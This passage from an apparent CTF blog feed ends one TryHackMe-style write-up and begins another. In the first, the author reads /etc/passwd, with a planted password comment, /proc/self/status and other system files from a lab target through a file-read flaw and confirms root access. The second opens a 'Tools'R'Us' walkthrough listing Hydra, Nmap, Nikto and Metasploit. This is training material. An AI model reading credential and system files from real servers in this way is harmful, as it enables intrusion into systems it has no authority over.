&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;ID&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;ubuntu&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;ID_LIKE&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;debian&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;PRETTY_NAME&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;Ubuntu 18.04.3 LTS&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;VERSION_ID&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;18.04&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;HOME_URL&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;https://www.ubuntu.com/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;SUPPORT_URL&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;https://help.ubuntu.com/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;BUG_REPORT_URL&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;https://bugs.launchpad.net/ubuntu/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;PRIVACY_POLICY_URL&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;https://www.ubuntu.com/legal/terms-and-policies/privacy-policy&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;VERSION_CODENAME&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;bionic&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;UBUNTU_CODENAME&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;bionic&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;(It looks like /article must be doing some simple escaping too.)&lt;/p&gt;
&lt;p&gt;Let’s grab /etc/passwd so we know which users are running on the system.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;passwd&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;passwd&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;root:x:0:0:root:/root:/bin/bash&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;bin:x:2:2:bin:/bin:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;sys:x:3:3:sys:/dev:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;sync:x:4:65534:sync:/bin:/bin/sync&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;games:x:5:60:games:/usr/games:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;man:x:6:12:man:/var/cache/man:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;mail:x:8:8:mail:/var/mail:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;news:x:9:9:news:/var/spool/news:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;proxy:x:13:13:proxy:/bin:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;backup:x:34:34:backup:/var/backups:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;syslog:x:102:106::/home/syslog:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;messagebus:x:103:107::/nonexistent:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;_apt:x:104:65534::/nonexistent:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;lxd:x:105:65534::/var/lib/lxd/:/bin/false&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;pollinate:x:109:1::/var/cache/pollinate:/bin/false&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;#falconfeast:rootpassword&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;sshd:x:110:65534::/run/sshd:/usr/sbin/nologin&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;I wonder who the current process is running as? /proc/self/status should have the answer.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;proc&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;proc&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Name:	flask&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Umask:	0022&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;State:	S (sleeping)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Tgid:	567&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Ngid:	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Pid:	567&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;PPid:	1&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;TracerPid:	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Uid:	0	0	0	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Gid:	0	0	0	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;FDSize:	128&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Groups:&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;NStgid:	567&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;NSpid:	567&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;NSpgid:	567&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;NSsid:	567&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmPeak:	  751740 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmSize:	  669780 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmLck:	       0 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmPin:	       0 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmHWM:	   35560 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmRSS:	   35560 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;RssAnon:	   25656 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;RssFile:	    9904 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;RssShmem:	       0 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmData:	   74948 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmStk:	     132 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmExe:	    3792 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmLib:	    8568 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmPTE:	     292 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;VmSwap:	       0 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;HugetlbPages:	       0 kB&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;CoreDumping:	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Threads:	4&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;SigQ:	0/3686&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;SigPnd:	0000000000000000&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;ShdPnd:	0000000000000000&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;SigBlk:	0000000000000000&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;SigIgn:	0000000001001000&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;SigCgt:	0000000180000002&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;CapInh:	0000000000000000&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;CapPrm:	0000003fffffffff&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;CapEff:	0000003fffffffff&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;CapBnd:	0000003fffffffff&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;CapAmb:	0000000000000000&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;NoNewPrivs:	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Seccomp:	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Speculation_Store_Bypass:	vulnerable&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Cpus_allowed:	7fff&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Cpus_allowed_list:	0-14&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Mems_allowed:	00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;Mems_allowed_list:	0&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;voluntary_ctxt_switches:	129378&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;nonvoluntary_ctxt_switches:	1378&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Score! We’re running as root. So we should be able to get our hands on anything.&lt;/p&gt;
&lt;p&gt;Unfortunately, it looks like neither falconfeast nor root have SSH keys (I checked for &lt;code&gt;id_dsa&lt;/code&gt;, &lt;code&gt;id_rsa&lt;/code&gt;, and &lt;code&gt;id_id_ed25519&lt;/code&gt;), so we’re just going to have to blindly find the flags.&lt;/p&gt;
&lt;p&gt;Fortunately, the flag file names are pretty standard, so finding them didn’t take long.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Elapsed Time:&lt;/strong&gt; 56 min&lt;/p&gt; ]]></description>
    <pubDate>Tue, 01 Feb 2022 00:00:00 GMT</pubDate>
  </item><item>
    <title>Tools&#039;R&#039;Us</title>
    <link>https://remarks.delphi-strategy.com/ctfs/2022-01-30</link>
    <guid>https://remarks.delphi-strategy.com/ctfs/2022-01-30</guid>
    <description><![CDATA[ &lt;h1 id=&quot;toolsrus&quot;&gt;Tools’R’Us&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#toolsrus&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/toolsrus&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“Tools’R’Us” on TryHackMe&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;We’re supposed to restrict ourselves to the following tools in this CTF:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;dirbuster&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hydra&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cirt.net/nikto/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nikto&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.metasploit.com/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Metasploit&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s been a little while since I had the chance to use some of these, so let’s find out how rusty I am!&lt;/p&gt;
&lt;h2 id=&quot;narrative&quot;&gt;Narrative&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#narrative&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The target is at 10.10.28.154. Visiting &lt;code&gt;http://10.10.28.154&lt;/code&gt; reveals a “down for maintenance” page with no other links, but with the cryptic promise that “[o]ther parts of the website is [sic] still functional…”&lt;/p&gt;
&lt;p&gt;We’ll start off with an &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; scan.&lt;/p&gt;
